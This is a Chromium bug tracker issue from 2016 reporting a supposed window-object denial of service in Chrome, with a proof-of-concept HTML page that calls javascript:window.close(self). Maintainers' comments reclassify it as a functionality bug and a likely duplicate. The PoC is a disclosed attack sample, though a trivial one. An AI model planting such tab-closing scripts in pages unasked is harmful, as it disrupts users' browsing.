Issue metadata
Sign in to add a comment
|
Denial of service attack(window object) on Google Chrome browser
Reported by
amarwagh...@gmail.com,
Nov 7 2016
|
||||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS The Google Chrome browser is vulnerable to window object based denial of service attack. The Google Chrome browser fails to sanitize a check when window.close() function is called in number of dynamically generated events.The function is called in a suppressed manner and kills the parent window directly by default which makes it vulnerable to denial of service attack. When an attacker sends an html file to victim :- <html> <title>Google Chrome Window Object Remote Denial of Service.</title> <head></head> <body><br><br> <h1><center>Google Chrome Window Object Remote Denial of Service</center></h1><br><br> <h2><center>Proof of Concept</center></br></br> </h2> <center> Click the below link to Trigger the Vulnerability..<br><br> <hr></hr> <hr></hr> <b><center><a href="javascript:window.close(self);">Google Chrome Window Object DoS Test POC</a></center> </center> </body> </html> Here window.close() method should be sanitized and should not close the current window.I tested it in Firefox(Linux and windows) and chrome(Linux platform) and this window object is validated there and current window doesn't close. This security issue is a result of design flaw in the browser.Scripts must not close windows that were not opened by script,if script specific code is designed. There must be a parent window confirmation check prior to close of window. VERSION Chrome Version: Version 54.0.2840.87 m (64-bit) + [stable] Operating System: [Windows 10] REPRODUCTION CASE The attached HTML file code goes here (Or you can find attachment): <html> <title>Google Chrome Window Object Remote Denial of Service.</title> <head></head> <body><br><br> <h1><center>Google Chrome Window Object Remote Denial of Service</center></h1><br><br> <h2><center>Proof of Concept</center></br></br> </h2> <center> Click the below link to Trigger the Vulnerability..<br><br> <hr></hr> <hr></hr> <b><center><a href="javascript:window.close(self);">Google Chrome Window Object DoS Test POC</a></center> </center> </body> </html> P.S : please let me know if you are not able to reproduce it.
,
Nov 7 2016
I can't repro on Mac or on Windows with Chrome 55.2883 or 56.2912. The console shows the following note: "Scripts may close only the windows that were opened by it."
,
Nov 7 2016
Correction: I can sometimes repro if the tab was opened via middle-click. That repro would be dupe of Issue 6773
,
Nov 7 2016
Alternate repro (works on Windows and Mac): 1. Left-click on the "View" link in comment #1; This will open the POC HTML in a new tab (we're only doing this to get a new tab that was opened with a _blank target) 2. In that new tab, navigate to https://bayden.com/test/selfclose.htm 3. In that page, observe that the back arrow is active. 4. Click the "Test POC" link Observe: Window closes, despite the fact that the back stack was not empty
,
Nov 8 2016
,
Nov 9 2016
Hi guyz, Have u got the security issue?
,
Nov 9 2016
Can you elaborate specifically on every step you used to reproduce the issue? How did you load the markup in question? Did you open it in a new tab? Chrome does not triage Denial-of-Service issues as security bugs: https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs- ... and as such this has been classified as a functionality bug. It may have the same underlying cause as Issue 6773.
,
Nov 9 2016
Yes I gusse its same that of 6773.
,
Nov 11 2016
,
Jan 12 2017
Issue 680546 has been merged into this issue. |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by est...@chromium.org
, Nov 7 2016Components: Blink>DOM
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Windows Type-Bug